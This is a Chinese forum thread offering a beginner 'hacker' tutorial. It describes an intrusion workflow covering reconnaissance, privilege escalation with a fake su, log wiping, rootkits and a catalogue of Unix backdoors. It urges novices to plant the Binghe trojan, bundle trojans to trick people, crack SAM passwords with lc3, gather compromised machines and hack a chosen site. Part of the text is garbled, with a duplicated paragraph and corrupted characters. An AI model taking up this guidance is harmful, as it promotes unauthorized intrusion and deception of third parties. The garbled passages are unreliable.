论坛: 菜鸟乐园 标题: 【推荐】菜鸟学习初级教程-----强烈推荐 复制本贴地址    
作者: xiaosi2007 [xiaosi2007]    论坛用户   登录

菜鸟学习初级教程-----强烈推荐(全部更新完毕)


基本技能...............................................................................1楼
黑客初级技术讲解(上)...................................................................2楼
黑客初级技术讲解(中)...................................................................3楼
黑客初级技术讲解(下)...................................................................4楼
基础知识(上)...........................................................................5楼
基础知识(中)...........................................................................6楼
基础知识(下)...........................................................................7楼
黑客常用兵器之木马篇(上)...............................................................8楼
黑客常用兵器之木马篇(下)...............................................................9楼
客常常用兵器之扫面篇(上)..............................................................10楼
黑客常用兵器之扫描篇(下)..............................................................11楼
代理,肉鸡,跳板的概念..................................................................12楼
网络监听概念..........................................................................13楼
系统进程信息..........................................................................14楼
端口全解析(上)........................................................................15楼
端口详细说明表(上)....................................................................16楼
端口详细说明表(中)....................................................................17楼
端口详细说明表(下)....................................................................18楼
端口详细说明表(下)....................................................................19楼
org菜鸟进阶(1)........................................................................20楼
菜鸟进阶(2)...........................................................................21楼
..............
菜鸟进阶(9)...........................................................................28楼
org术语表(1)..........................................................................29楼
..........
org术语表(5)..........................................................................33楼
个人电脑安全..........................................................................34楼
网络安全知识(1).......................................................................35楼
...............
网络安全知识(6).......................................................................41楼
防范非系统用户破坏....................................................................42楼
黑客扫描特征及易受攻击的端口..........................................................43楼
PING命令及使用技巧....................................................................44楼
GHOST详细解说(1)......................................................................45楼
..............
GHOST详细解说(3)......................................................................47楼
ipc$详细解说大全(1)...................................................................48楼
ipc$详细解说大全(2)...................................................................49楼
常见ASP脚本攻击及防范技巧.............................................................50楼
37秒迅速破解网吧......................................................................51楼
开启3389的5种方法(上).................................................................52楼
开启3389的5种方法(下).................................................................53楼
DOS攻击原理及方法介绍.................................................................54楼
如何突破各种防火墙....................................................................55楼
蠕虫技术(上)..........................................................................56楼
.......................
蠕虫技术(下)..........................................................................58楼
壳(上)................................................................................59楼
壳(下)................................................................................60楼
简单黑客工具使用......................................................................61楼
永远的后门............................................................................62楼
入门者如何获得肉鸡....................................................................63楼
流光的使用方法........................................................................64楼
溢出专集..............................................................................65楼
NET START可以起用命令一览表...........................................................66楼
PHP注入实例...........................................................................67楼





一个黑客的基本技能

1、黑客的精神态度是很重要的,但技术则更是重要。黑客的态度虽然是无可取代,随著新科技的发明和旧技术的取代,这些工具随时间在慢慢的改变。例如:以往总是会学会用机器码写程序,直到最近我们开始使用HTML。不过,在1996年末,当然,这是基础的hacking技能。在1997年,理所当然的,你必须学会C。 但,如果你只是学一种语言,那么你不能算是一位黑客,了不起只能算是一个programmer。除此,你还必须学会学会以独立于任何程序语言之上的概括性观念来思考一件程序设计上的问题。要成为一位真正的黑客,你必须要能在几天之内将manual内容和你目前己经知道的关连起学会一种新的语言。也就是说,你必会学还了C之外的东西,你至少还要会LISP或Perl(Java也正在努力的挤上这个名单; 译者注: 我很怀疑这份名单)。除了几个重要的hacking常用语言之外,这些语言提供你一些不同的程序设计途径,并且让你在好的方法中学习。

程序设计是一种复杂的技术,我没辨法在这提供完整的学习步骤。但是我能告诉你一些在书本上和课堂上所没有的东西(有很多,几乎全部最好的黑客们都是自习而来的)。(a) 读别人的程序码;(写程序,这两项是不错的方法。学习写程序就像在学习写一种良好的自然语言,最好的方法是去看一些专家们所写的东西,然后写一些你自己的东西,然后读更多,再写更多。然后一直持续,一直到你发展出一种属于自己的风格和特色。要找到好的程序码来看是很一件很困难的事,因为,对菜鸟黑客们而言,适于供他们阅读和努力的大型程序的source数量很少。但这事己有了戏剧性的变化了; 现在免费的供应的软件、程序设计工具和操作系统(大都公开提供 source,而且全都是由黑客们写成的)到处可看。进入下一个主题。

2、取得一个免费的 UNIX,并学习使用和维护。我先假设你己经有一部个人电脑或者是可以使用任何一部(现在的小孩子真幸福,可如此轻易的拥有 :-))。 取得黑客技巧的第一个步骤是取得一份Linux 或者一份免费的 BSD-Unix,并将它安装在自己的机器,并使之顺利的运作。没错,在这个世界上除了Unix之外,还有其它的操作系统。但是他们只提供bianry,你不能看到他们的程序码,你也不能修改他们。想要在DOS或Windows或MacOS开始hacking,无疑就是要你绑著枷锁跳舞一样。

除此之外,Unix是Internet上的操作系统。当你在不懂Unix的情况下学习使用Internet时,你没辨法在不懂Unix的情况下成为Internet的黑客。因为这个原故,现在的黑客文化还是很牢固的以Unix为中心。(这并不完全是正确的,而且有些活在旧时代的黑客甚至也不喜欢这种情形,但是Unix和Internet之间的共生共成己经到了牢不可破的地步,即使是Microsoft的大块肌肉也没能在上面留下明显的伤痕。) 因些,把Unix装起来吧! (我自己是喜欢Linux,但是还有其它的东东可用。) 学习它,让它运作起来,让它陪你努力精进。 用他向整个Internet喊话。看程序码,改程序。

有一天你成为一位高竿的黑客,你回头往后看时会发现,你得到比Microsoft操作系统所能提供的还要好的程序设计工具(包括 C,Lisp和 Perl)。而且得到快乐,并学到比共生共成己经到了牢不可破的地步,即使是Microsoft的大块肌肉也没能在上面留下明显的伤痕。) 因些,把Unix装起来吧! (我自己是喜欢Linux,但是还有其它的东东可用。) 学习它,让它运作起来,让它陪你努力精进。用他向整个Internet喊话。 看程序码,改程序。有一天你成为一位高竿的黑客,你回头往后看时会发现,你得到比Microsoft操作系统所能提供的还要好的程序设计工具(包括 C,Lisp和 Perl)。而且得到快乐,并
学到比你想像中的还要多的知识。关于学习Unix,在Loginataka有更多的资料。(http://www.ccil.org/~esr/faqs/loginataka。)
看一下Linux distribution的目录或 Linux CD,并把自己交付给它。

3、学习使用World Wide Web并学会写 HTML。
在黑客文化创造出来的东西,大多在他们的活动范围外被使用著,如,在工厂和辨公室或大学被漠漠的使用著。但Web是一个很大的例外,这个黑客眼中的大玩具甚至还被政客们接受,并巧巧的在改变这个世界。因此(还有很多好的理由),你必须学习Web。并不只是学习使用browser(这太容易了)而己,还要学会写HTML这个Web的标签语言。如果你不知道如何设计程序,写HTML也可以给一些习惯上的帮助。嗯!! 建立home page吧! 不过,有一个home page 并没任何特别之处能让你成为一位黑客。Web上到处都是home page,而且大部份都没什么重点,没什么内容的烂泥 -- 很好看的烂泥巴,但是看起来都一样,差不多。

4、至少学会以下的其中两种:
一、网站服务器程序ASP、PHP、CGI、jsP
我个人认为CGI是最难学的其中一种。
二、程序语言:C语言、C++、VB、JAVA、PERL、DELPHI、汇编语言
不过我认为C语言的通用性最好,可以跨平台(操作系统)使用。
还要试着自己写程序、开发软件等工作。
三、数据库管理软件:MYSQL、SQL、FOXPRO……等。
四、几种常用的操作系统:WIN98、WIN2000、WINNT、WINXP、UNIX、LINUX、要是能学到UNIX那是最好不过的了。最最基本的WIN2K、WINNT也要学会吧。
如果以上的你都会了,那么你已经是个高手了。

地主 发表时间: 10-07-16 18:10

回复: xiaosi2007 [xiaosi2007]   论坛用户   登录
黑客初级技术讲解(上)

网络安全从其本质上来讲就是网络上的信息安全。从广义来说,凡是涉及到网络上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是网络安全的研究领域。确保网络系统的信息安全是网络安全的目标,信息安全包括两个方面:信息的存 储安全和信息的传输安全。信息的存储安全是指信息在静态存放状态下的安全,如是否会被非授权调用等。信息的传输安全是指信息在动态传输过程中安全。为了确保网络信息的传输安全,有以下几个问题:

  (1)对网络上信息的监听
  (2)对用户身份的仿冒
  (3)对网络上信息的篡改
  (4)对发出的信息予以否认
  (5)对信息进行重发

  对于一般的常用入侵方法主要有

  1.口令入侵

  所谓口令入侵,就是指用一些软件解开已经得到但被人加密的口令文档,不过许多黑客已大量采用一种可以绕开或屏蔽口令保护的程序来完成这项工作。对于那些可以解开或屏蔽口令保护的程序通常被称为“Crack”。由于这些软件的广为流传,使得入侵电脑网络系统有时变得相当简单,一般不需要很深入了解系统的内部结构,是初学者的好方法。

  2.特洛伊木马术

  说到特洛伊木马,只要知道这个故事的人就不难理解,它最典型的做法可能就是把一个能帮助黑客完成某一特定动作的程序依附在某一合法用户的正常程序中,这时合法用户的程序代码已被该变。一旦用户触发该程序,那么依附在内的黑客指令代码同时被激活,这些代码往往能完成黑客指定的任务。由于这种入侵法需要黑客有很好的编程经验,且要更改代码、要一定的权限,所以较难掌握。但正因为它的复杂性,一般的系统管理员很难发现。

  3.监听法

  这是一个很实用但风险也很大的黑客入侵方法,但还是有很多入侵系统的黑客采用此类方法,正所谓艺高人胆大。

  网络节点或工作站之间的交流是通过信息流的转送得以实现,而当在一个没有集线器的网络中,数据的传输并没有指明特定的方向,这时每一个网络节点或工作站都是一个接口。这就好比某一节点说:“嗨!你们中有谁是我要发信息的工作站。”

  此时,所有的系统接口都收到了这个信息,一旦某个工作站说:“嗨!那是我,请把数据传过来。”联接就马上完成。

  目前有网络上流传着很多嗅探软件,利用这些软件就可以很简单的监听到数据,甚至就包含口令文件,有的服务在传输文件中直接使用明文传输,这也是非常危险的
4.E-mail技术

  使用email加木马程序这是黑客经常使用的一种手段,而且非常奏效,一般的用户,甚至是网管,对网络安全的意识太过于淡薄,这就给很多黑客以可乘之机。

  5.病毒技术
  作为一个黑客,如此使用应该是一件可耻的事情,不过大家可以学习,毕竟也是一种攻击的办法,特殊时间,特殊地点完全可以使用。

  6.隐藏技术

  网络攻击的一般步骤及实例

  攻击的准备阶段

  首先需要说明的是,入侵者的来源有两种,一种是内部人员利用自己的工作机会和权限来获取不应该获取的权限而进行的攻击。另一种是外部人员入侵,包括远程入侵、网络节点接入入侵等。本节主要讨论远程攻击。

  进行网络攻击是一件系统性很强的工作,其主要工作流程是:收集情报,远程攻击,远程登录,取得普通用户的权限,取得超级用户的权限,留下后门,清除日志。主要内容包括目标分析,文档获取,破解密码,日志清除等技术,下面分别介绍。

  1.确定攻击的目的

  攻击者在进行一次完整的攻击之前首先要确定攻击要达到什么样的目的,即给对方造成什么样的后果。常见的攻击目的有破坏型和入侵型两种。破坏型攻击指的只是破坏攻击目标,使其不能正常工作,而不能随意控制目标的系统的运行。要达到破坏型攻击的目的,主要的手段是拒绝服务攻击(Denial Of Service)。另一类常见的攻击目的是入侵攻击目标,这种攻击是要获得一定的权限来达到控制攻击目标的目的。应该说这种攻击比破坏型攻击更为普遍,威胁性也更大。因为黑客一旦获取攻击目标的管理员权限就可以对此服务器做任意动作,包括破坏性的攻击。此类攻击一般也是利用服务器操作系统、应用软件或者网络协议存在的漏洞进行的。当然还有另一种造成此种攻击的原因就是密码泄露,攻击者靠猜测或者穷举法来得到服务器用户的密码,然后就可以用和真正的管理员一样对服务器进行访问。

  2.信息收集

  除了确定攻击目的之外,攻击前的最主要工作就是收集尽量多的关于攻击目标的信息。这些信息主要包括目标的操作系统类型及版本,目标提供哪些服务,各服务器程序的类型与版本以及相关的社会信息。

  要攻击一台机器,首先要确定它上面正在运行的操作系统是什么,因为对于不同类型的操作系统,其上的系统漏洞有很大区别,所以攻击的方法也完全不同,甚至同一种操作系统的不同版本的系统漏洞也是不一样的。要确定一台服务器的操作系统一般是靠经验,有些服务器的某些服务显示信息会泄露其操作系统。例如当我们通过TELNET连上一台机器时,如果显示

  Unix(r)System V Release 4.0
  login:

  那么根据经验就可以确定这个机器上运行的操作系统为SUN OS 5.5或5.5.l。但这样确定操作系统类型是不准确的,因为有些网站管理员为了迷惑攻击者会故意更改显示信息,造成假象。
还有一种不是很有效的方法,诸如查询DNS的主机信息(不是很可靠)来看登记域名时的申请机器类型和操作系统类型,或者使用社会工程学的方法来获得,以及利用某些主机开放的SNMP的公共组来查询。

  另外一种相对比较准确的方法是利用网络操作系统里的TCP/IP堆栈作为特殊的“指纹”来确定系统的真正身份。因为不同的操作系统在网络底层协议的各种实现细节上略有不同。可以通过远程向目标发送特殊的包,然后通过返回的包来确定操作系统类型。例如通过向目标机发送一个FIN的包(或者是任何没有ACK或SYN标记的包)到目标主机的一个开放的端口然后等待回应。许多系统如windows、 BSDI、 CISCO、 HP/UX和 IRIX会返回一个RESET。通过发送一个SYN包,它含有没有定义的TCP标记的TCP头。那么在Linux系统的回应包就会包含这个没有定义的标记,而在一些别的系统则会在收到SYN+BOGU包之后关闭连接。或是利用寻找初始化序列长度模板与特定的操作系统相匹配的方法。利用它可以对许多系统分类,如较早的Unix系统是64K长度,一些新的Unix系统的长度则是随机增长。还有就是检查返回包里包含的窗口长度,这项技术根据各个操作系统的不同的初始化窗口大小来唯一确定它们。利用这种技术实现的工具很多,比较著名的有NMAP、CHECKOS、QUESO等。

  获知目标提供哪些服务及各服务daemon的类型、版本同样非常重要,因为已知的漏洞一般都是对某一服务的。这里说的提供服务就是指通常我们提到的喘口,例如一般TELNET在23端口,FTP在对21端口,WWW在80端口或8080端口,这只是一般情况,网站管理完全可以按自己的意愿修改服务所监听的端口号。在不同服务器上提供同一种服务的软件也可以是不同,我们管这种软件叫做daemon,例如同样是提供FTP服务,可以使用wuftp、proftp,ncftp等许多不同种类的daemon。确定daemon的类型版本也有助于黑客利用系统漏洞攻破网站。

  另外需要获得的关于系统的信息就是一些与计算机本身没有关系的社会信息,例如网站所属公司的名称、规模,网络管理员的生活习惯、电话号码等。这些信息看起来与攻击一个网站没有关系,实际上很多黑客都是利用了这类信息攻破网站的。例如有些网站管理员用自己的电话号码做系统密码,如果掌握了该电话号码,就等于掌握了管理员权限进行信息收集可以用手工进行,也可以利用工具来完成,完成信息收集的工具叫做扫描器。用扫描器收集信息的优点是速度快,可以一次对多个目标进行扫描。

  攻击的实施阶段

  1.获得权限

  当收集到足够的信息之后,攻击者就要开始实施攻击行动了。作为破坏性攻击,只需利用工具发动攻击即可。而作为入侵性攻击,往往要利用收集到的信息,找到其系统漏洞,然后利用该漏洞获取一定的权限。有时获得了一般用户的权限就足以达到修改主页等目的了,但作为一次完整的攻击是要获得系统最高权限的,这不仅是为了达到一定的目的,更重要的是证明攻击者的能力,这也符合黑客的追求。

  能够被攻击者所利用的漏洞不仅包括系统软件设计上的安全漏洞,也包括由于管理配置不当而造成的漏洞。前不久,因特网上应用最普及的著名www服务器提供商Apache的主页被黑客攻破,其主页面上的 Powered by Apache图样(羽毛状的图画)被改成了Powered by Microsoft Backoffice的图样,那个攻击者就是利用了管理员对Webserver用数据库的一些不当配置而成功取得最高权限的。

B1层 发表时间: 10-07-16 18:11

回复: xiaosi2007 [xiaosi2007]   论坛用户   登录
黑客初级技术讲解(中)

  当然大多数攻击成功的范例还是利用了系统软件本身的漏洞。造成软件漏洞的主要原因在于编制该软件的程序员缺乏安全意识。当攻击者对软件进行非正常的调用请求时造成缓冲区溢出或者对文件的非法访问。其中利用缓冲区溢出进行的攻击最为普遍,据统计80%以上成功的攻击都是利用了缓冲区溢出漏洞来获得非法权限的。关于缓冲区溢出在后面用专门章节来作详细解释。

  无论作为一个黑客还是一个网络管理员,都需要掌握尽量多的系统漏洞。黑客需要用它来完成攻击,而管理员需要根据不同的漏洞来进行不同的防御措施。了解最新最多的漏洞信息,可以到诸如Rootshell(www.rootshell.com)、Packetstorm(packetstorm.securify.com)、Securityfocus(www.securityfocus.com)等网站去查找。

  2.权限的扩大

  系统漏洞分为远程漏洞和本地漏洞两种,远程漏洞是指黑客可以在别的机器上直接利用该漏洞进行攻击并获取一定的权限。这种漏洞的威胁性相当大,黑客的攻击一般都是从远程漏洞开始的。但是利用远程漏洞获取的不一定是最高权限,而往往只是一个普通用户的权限,这样常常没有办法做黑客们想要做的事。这时就需要配合本地漏洞来把获得的权限进行扩大,常常是扩大至系统的管理员权限。
只有获得了最高的管理员权限之后,才可以做诸如网络监听、打扫痕迹之类的事情。要完成权限的扩大,不但可以利用已获得的权限在系统上执行利用本地漏洞的程序,还可以放一些木马之类的欺骗程序来套取管理员密码,这种木马是放在本地套取最高权限用的,而不能进行远程控制。例如一个黑客已经在一台机器上获得了一个普通用户的账号和登录权限,那么他就可以在这台机器上放置一个假的su程序。一旦黑客放置了假su程序,当真正的合法用户登录时,运行了su,并输入了密码,这时root密码就会被记录下来,下次黑客再登录时就可以使用su变成root了。

  攻击的善后工作

  1.日志系统简介

  如果攻击者完成攻击后就立刻离开系统而不做任何善后工作,那么他的行踪将很快被系统管理员发现,因为所有的网络操作系统一般都提供日志记录功能,会把系统上发生的动作记录下来。所以,为了自身的隐蔽性,黑客一般都会抹掉自己在日志中留下的痕迹。想要了解黑客抹掉痕迹的方法,首先要了解常见的操作系统的日志结构以及工作方式。Unix的日志文件通常放在下面这几个位置,根据操作系统的不同略有变化

  /usr/adm——早期版本的Unix。
  /Var/adm新一点的版本使用这个位置。
  /Varflort一些版本的Solaris、 Linux BSD、 Free BSD使用这个位置。
  /etc,大多数Unix版本把Utmp放在此处,一些Unix版本也把Wtmp放在这里,这也是Syslog.conf的位置。

  下面的文件可能会根据你所在的目录不同而不同:

  acct或pacct-一记录每个用户使用的命令记录。
  accesslog主要用来服务器运行了NCSA HTTP服务器,这个记录文件会记录有什么站点连接过你的服务器。
  aculo保存拨出去的Modems记录。
  lastlog记录了最近的Login记录和每个用户的最初目的地,有时是最后不成功Login的记录。
  loginlog一记录一些不正常的L0gin记录。
  messages——记录输出到系统控制台的记录,另外的信息由Syslog来生成
  security记录一些使用 UUCP系统企图进入限制范围的事例。
  sulog记录使用su命令的记录。
  utmp记录当前登录到系统中的所有用户,这个文件伴随着用户进入和离开系统而不断变化。
  Utmpx,utmp的扩展。
  wtmp记录用户登录和退出事件。
  Syslog最重要的日志文件,使用syslogd守护程序来获得。

  2.隐藏踪迹

  攻击者在获得系统最高管理员权限之后就可以随意修改系统上的文件了(只对常规 Unix系统而言),包括日志文件,所以一般黑客想要隐藏自己的踪迹的话,就会对日志进行修改。最简单的方法当然就是删除日志文件了,但这样做虽然避免了系统管理员根据IP追踪到自己,但也明确无误地告诉了管理员,系统己经被人侵了。所以最常用的办法是只对日志文件中有关自己的那一部分做修改。关于修改方法的具体细节根据不同的操作系统有所区别,网络上有许多此类功能的程序,例如 zap、 wipe等,其主要做法就是清除 utmp、wtmp、Lastlog和 Pacct等日志文件中某一用户的信息,使得当使用w、who、last等命令查看日志文件时,隐藏掉此用户的信息。
管理员想要避免日志系统被黑客修改,应该采取一定的措施,例如用打印机实时记录网络日志信息。但这样做也有弊端,黑客一旦了解到你的做法就会不停地向日志里写入无用的信息,使得打印机不停地打印日志,直到所有的纸用光为止。所以比较好的避免日志被修改的办法是把所有日志文件发送到一台比较安全的主机上,即使用loghost。即使是这样也不能完全避免日志被修改的可能性,因为黑客既然能攻入这台主机,也很可能攻入loghost。

  只修改日志是不够的,因为百密必有一漏,即使自认为修改了所有的日志,仍然会留下一些蛛丝马迹的。例如安装了某些后门程序,运行后也可能被管理员发现。所以,黑客高手可以通过替换一些系统程序的方法来进一步隐藏踪迹。这种用来替换正常系统程序的黑客程序叫做rootkit,这类程序在一些黑客网站可以找到,比较常见的有LinuxRootKit,现在已经发展到了5.0版本了。它可以替换系统的ls、ps、netstat、inetd等等一系列重要的系统程序,当替换了ls后,就可以隐藏指定的文件,使得管理员在使用ls命令时无法看到这些文件,从而达到隐藏自己的目的。

  3.后门

   一般黑客都会在攻入系统后不只一次地进入该系统。为了下次再进入系统时方便一点,黑客会留下一个后门,特洛伊木马就是后门的最好范例。Unix中留后门的方法有很多种,下面介绍几种常见的后门,供网络管理员参考防范。

  <1>密码破解后门
  这是入侵者使用的最早也是最老的方法,它不仅可以获得对Unix机器的访问,而且可 以通过破解密码制造后门。这就是破解口令薄弱的帐号。以后即使管理员封了入侵者的当前帐号,这些新的帐号仍然可能是重新侵入的后门。多数情况下,入侵者寻找口令薄弱的未使用帐号,然后将口令改的难些。当管理员寻找口令薄弱的帐号是,也不会发现这些密码已修改的帐号。因而管理员很难确定查封哪个帐号。

  <2>Rhosts + + 后门
  在连网的Unix机器中,象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简 单的认证方法。用户可以轻易的改变设置而不需口令就能进入。 入侵者只要向可以访问的某用户的rhosts文件中输入"+ +",就可以允许任何人从任何地方无须口令便能进 入这个帐号。特别当home目录通过NFS向外共享时,入侵者更热中于此。这些帐号也成 了入侵者再次侵入的后门。许多人更喜欢使用Rsh,因为它通常缺少日志能力. 许多管理员经常检查 "+ +",所以入侵者实际上多设置来自网上的另一个帐号的主机名和 用户名,从而不易被发现。

  <3>校验和及时间戳后门
  早期,许多入侵者用自己的trojan程序替代二进制文件。系统管理员便依靠时间戳和系 统校验和的程序辨别一个二进制文件是否已被改变,如Unix里的sum程序。入侵者又发展了使trojan文件和原文件时间戳同步的新技术。它是这样实现的: 先将系统时钟拨 回到原文件时间,然后调整trojan文件的时间为系统时间。一旦二进制trojan文件与 原来的精确同步,就可以把系统时间设回当前时间。Sum程序是基于CRC校验,很容易 骗过。入侵者设计出了可以将trojan的校验和调整到原文件的校验和的程序。MD5是被 大多数人推荐的,MD5使用的算法目前还没人能骗过。

B2层 发表时间: 10-07-16 18:13

回复: xiaosi2007 [xiaosi2007]   论坛用户   登录
黑客初级技术讲解(下)


  <4>Login后门
  在Unix里,login程序通常用来对telnet来的用户进行口令验证. 入侵者获取login.c的 原代码并修改,使它在比较输入口令与存储口令时先检查后门口令。如果用户敲入后门 口令,它将忽视管理员设置的口令让你长驱直入。这将允许入侵者进入任何帐号,甚至 是root。由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问 的,所以入侵者可以登录获取shell却不会暴露该帐号。管理员注意到这种后门后,便 用"strings"命令搜索login程序以寻找文本信息. 许多情况下后门口令会原形毕露。入侵者就开始加密或者更好的隐藏口令,使strings命令失效<5>Telnetd后门
  当用户telnet到系统,监听端口的inetd服务接受连接随后递给in.telnetd,由它运行 login.一些入侵者知道管理员会检查login是否被修改,就着手修改in.telnetd. 在in.telnetd内部有一些对用户信息的检验,比如用户使用了何种终端. 典型的终端 设置是Xterm或者VT100.入侵者可以做这样的后门,当终端设置为"letmein"时产生一 个不要任何验证的shell. 入侵者已对某些服务作了后门,对来自特定源端口的连接产 生一个shell。

  <6>服务后门
  几乎所有网络服务曾被入侵者作过后门. Finger,rsh,rexec,rlogin,ftp,甚至 inetd等等的作了的版本随处多是。有的只是连接到某个TCP端口的shell,通过后门口令就能获取访问。这些程序有时用刺娲□?Ucp这样不用的服务,或者被加入inetd.conf 作为一个新的服务,管理员应该非常注意那些服务正在运行,并用MD5对原服务程序做校验。

  <7>Cronjob后门
  Unix上的Cronjob可以按时间表调度特定程序的运行。入侵者可以加入后门shell程序 使它在1AM到2AM之间运行,那么每晚有一个小时可以获得访问。也可以查看cronjob中 经常运行的合法程序,同时置入后门。

  <8>库后门
  几乎所有的UNIX系统使用共享库,共享库用于相同函数的重用而减少代码长度。一些入侵者在象crypt.c和_crypt.c这些函数里作了后门;象login.c这样的程序调用了 crypt()。当使用后门口令时产生一个shell。 因此,即使管理员用MD5检查login程序,仍然能产生一个后门函数,而且许多管理员并不会检查库是否被做了后门。对于许多入侵者来说有一个问题: 一些管理员对所有东西多作了MD5校验,有一种办法是入侵者对open()和文件访问函数做后门。后门函数读原文件但执行trojan后门程序。所以 当MD5读这些文件时,校验和一切正常,但当系统运行时将执行trojan版本的,即使trojan库本身也可躲过MD5校验,对于管理员来说有一种方法可以找到后门,就是静态编连MD5校验程序然后运行,静态连接程序不会使用trojan共享库。

  <9>内核后门
  内核是Unix工作的核心,用于库躲过MD5校验的方法同样适用于内核级别,甚至连静态 连接多不能识别. 一个后门作的很好的内核是最难被管理员查找的,所幸的是内核的 后门程序还不是随手可得,每人知道它事实上传播有多广。

 <10>文件系统后门
  入侵者需要在服务器上存储他们的掠夺品或数据,并不能被管理员发现,入侵者的文章常是包括exploit脚本工具,后门集,sniffer日志,email的备分,原代码,等等!有时为了防止管理员发现这么大的文件,入侵者需要修补"ls","du","fsck"以隐匿特定的目录和文件,在很低的级别,入侵者做这样的漏洞: 以专有的格式在硬盘上割出一部分,且表示为坏的扇区。因此入侵者只能用特别的工具访问这些隐藏的文件,对于普通的管理员来说,很难发现这些"坏扇区"里的文件系统,而它又确实存在。

  <11>Boot块后门
  在PC世界里,许多病毒藏匿与根区,而杀病毒软件就是检查根区是否被改变。Unix下,多数管理员没有检查根区的软件,所以一些入侵者将一些后门留在根区。
. 所以更多的管理员是 用MD5校验和检测这种后门的。
<12>隐匿进程后门
  入侵者通常想隐匿他们运行的程序,这样的程序一般是口令破解程序和监听程序 (sniffer),有许多办法可以实现,这里是较通用的: 编写程序时修改自己的argv[] 使它看起来象其他进程名。可以将sniffer程序改名类似in.syslog再执行,因此 当管理员用"ps"检查运行进程时,出现 的是标准服务名。可以修改库函数致使 "ps"不能显示所有进程,可以将一个后门或程序嵌入中断驱动程序使它不会在进程表显现。使用这个技术的一个后门例子是

  amod.tar.gz :
  http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html网络通行. 这些网络通行后 门有时允许入侵者通过防火墙进行访问。有许多网络后门程序允许入侵者建立某个端 口号并不用通过普通服务就能实现访问. 因为这是通过非标准网络端口的通行,管理 员可能忽视入侵者的足迹. 这种后门通常使用TCP,UDP和ICMP,但也可能是其他类型报文。

  <14>TCP Shell 后门
  入侵者可能在防火墙没有阻塞的高位TCP端口建立这些TCP Shell后门. 许多情况下,他 们用口令进行保护以免管理员连接上后立即看到是shell访问. 管理员可以用netstat 命令查看当前的连接状态,那些端口在侦听,目前连接的来龙去脉. 通常这些后门可 以让入侵者躲过TCP Wrapper技术. 这些后门可以放在SMTP端口,许多防火墙允许 e-mail通行的.

  <15>UDP Shell 后门
  管理员经常注意TCP连接并观察其怪异情况,而UDP Shell后门没有这样的连接,所以 netstat不能显示入侵者的访问痕迹,许多防火墙设置成允许类似DNS的UDP报文的通行,通常入侵者将UDP Shell放置在这个端口,允许穿越防火墙。

  <16>ICMP Shell 后门
  Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一。许多防火墙允许外界ping它内部的机器,入侵者可以放数据入Ping的ICMP包,在ping的机器间形成一个shell通道,管理员也许会注意到Ping包暴风,但除了他查看包内数据,否者入侵者不会暴露。

  <17>加密连接
  管理员可能建立一个sniffer试图某个访问的数据,但当入侵者给网络通行后门加密 后,就不可能被判定两台机器间的传输内容了。

B3层 发表时间: 10-07-16 18:15

回复: xiaosi2007 [xiaosi2007]   论坛用户   登录
基础知识(上)


我认为这是一套适合初学者由浅到深的文章,所以强烈推荐给大家,作者从基础讲到最近比较火的漏洞,可能有些人看来是浅了些,但是的确很适合想干点啥但又不知道怎么办的菜鸟们 。

第一节,伸展运动。这节操我们要准备道具,俗话说:“工欲善其事,必先利其器”(是这样吗?哎!文化低……)说得有道理,我们要学习黑客技术,一点必要的工具必不可少。

1,一台属于自己的可以上网的电脑。这样你可以有充分的支配权,上网不用说,否则你怎么看到我的文章?wap?呵呵!属于自己很重要,否则安全性是个很大的问题。第一点相信大家没有问题。

2,windows2000/nt,别和我说98/me,他们是你们同学用来玩游戏的!(当然,我也是铁杆game fan)对网络支持极差,命令受限制,很多软件又不能用,对黑客来说使用起来绊手绊脚,非常不利。这里我推荐2000,这是一个很成熟的系统(漏洞还是有一堆)。推荐双系统,这样黑玩搭配,干活不累。

3,冰河。中国第一木马,中者数不胜数,国人骄傲。虽然用冰河根本不能算黑客,但它确实能培养你对黑客的兴趣,同时帮助你了解网络,相信很多黑客同学都是这样起步的。静止写的那篇冰河教程很不错,大家仔细看看。而且,以后你学会入侵服务器后,用冰河操作也会减少工作量(我是懒虫,爽!)

4,oicq。我们学黑客,可不是学泡mm!bfctx你………… 息怒息怒!我们当然是学黑客,但不要忘了,众人拾柴火更高,我们通过cshu的成员列表,互相联系帮助,对提高水平很有帮助!另外我要废话一句:据我了解,现在黑客网站下载最多的都是针对oicq的破解工具,我个人认为很无聊,偷个密码代表什么,浪费时间!最后补充:mm不能不泡。(谁砸我??!!)

5,superscan。很好用的端口扫描器,速度超快,功能一流,一旦拥有,别无所求……(打住!)不论是找木马受害者,还是扫服务器端口,它都非常有效,cshu强烈推荐!

6,一本笔记本/便条,网上资料相当多,黑客处理的也是非常之多。良好的习惯决定了你的效率,准备一本笔记本,记录下你的成果,肉鸡,木马利用,命令,密码……坚持一下,你会发现你的效率大幅上升的!

7,lc3.著名nt/2000sam破解程序,有时我们拿不到足够权限,又没好办法,那么lc3是最好的解决办法,只要你拿的到sam,你就是服务器它爷爷!本站有其破解程序,支持了暴力破解!

8,程序合并。这是玩木马必需的,虽然木马是很低的手段,但有时配合巧办法(以后我会介绍)确实能够达到意想不到的效果,朋友们可以在空闲时玩玩木马,很有趣,若你能巧妙的骗过mm,那么webmaster也可能被你骗倒:〉 (比较理想化)

9,流光4for 2000/nt。可能是世界上最好的综合类黑软!中国的骄傲,它集成了很全的漏洞信息,速度快,方法多,对有漏洞的主机是毁灭性的打击,操作又方便,是快速黑站必不可少的精品工具。超级吐血推荐!!

10,良好的心态,稳定的情绪,刻苦钻研的精神,刨根问底的作风,打扫房间的习惯。黑客是门很高深的学问,不要幻想一步登天,失败是常有的事,千万不可灰心。在那么多黑软的包围下,切不可完全依赖他们,一定要了解它们利用什么原理工作。对任何一个小问题,小细节,一定要问清楚,cshu就是给大家互相交流的场所哦!黑完后不要得意忘形,打扫战场也很重要,以防万一。

第一节操完,可能很无聊,我就这点水平,大家见谅!这里我说一句大话:做完菜鸟操,包你会黑简单的站(哎哟!心慌了!)

下一节操我们要介绍如何掌握一台主机的基本信息,期待中……

真是太对不起大家了,隔了那么久才写这篇教程,我这几天实在太忙,大家还是体谅一下我吧,好了,开始做操。

今天的内容是获得主机的信息。 我们要黑一台主机,首先要了解它的信息,包括它的类型,用户列表,目录,端口,漏洞等等。

首先我们我们要找一台主机来练手,随便挑吧!www.flyingfish.com(乱说的)

第一部,呵呵,先在ie里看看吧,mmmm.....做的还行,挺精致的!主要是我们肯定了它现在是正常的。 然后,我们应该知道它的ip,很简单,ping它一下就可以了。

